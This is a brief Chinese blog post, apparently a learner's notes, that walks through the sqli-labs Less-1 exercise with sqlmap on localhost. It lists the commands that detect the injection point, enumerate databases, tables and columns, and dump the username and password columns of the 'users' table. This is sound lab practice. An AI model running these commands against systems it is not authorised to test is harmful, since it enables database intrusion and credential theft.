Less1(sqlmap)

Less-1

检查注入点

python sqlmap.py -u http://127.0.0.1/Less-1/?id=1

爆数据库信息

python sqlmap.py -u http://127.0.0.1/Less-1/?id=1 --dbs

爆当前数据库信息

python sqlmap.py -u http://127.0.0.1/Less-1/?id=1 --current-db

爆指定数据库中所有表信息

python sqlmap.py -u http://127.0.0.1/Less-1/?id=1 -D security --tables

爆指定表的所有列的段名

python sqlmap.py -u http://127.0.0.1/Less-1/?id=1 -D security -T users --columns

爆表中所有内容

python sqlmap.py -u http://127.0.0.1/Less-1/?id=1 -D security -T users -C id,password,username --dump

由于借助了sqlmap所以对于sql注入的原理仍然不是很理解。因此在接下来的日子里会练习手动注入

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • sqlmap手册
    sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 6,325评论 0 5
  • SQLMap用户手册【超详细】
    http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 13,531评论 2 22
  • sqlmap常用命令语句
    转自 http://www.75271.com/1228.html 基础信息 pythonsqlmap/sqlma...
    H0f_9阅读 5,455评论 0 2
  • 我们渐行渐远
    最近总是被一股怨气环绕,来源是因为宿舍两个人,总觉得一个虚伪恶心,一个恩将仇报。虽然词语形容的很是浮夸,但是大体感...
    我是一只大妖啊阅读 3,434评论 0 0
  • 2017/11/10
    2017.11.10 大风 周五 今天是期中考试成绩下发的日子,中午就有家长就托辅群里问自己孩...
    宇涵妈阅读 897评论 0 0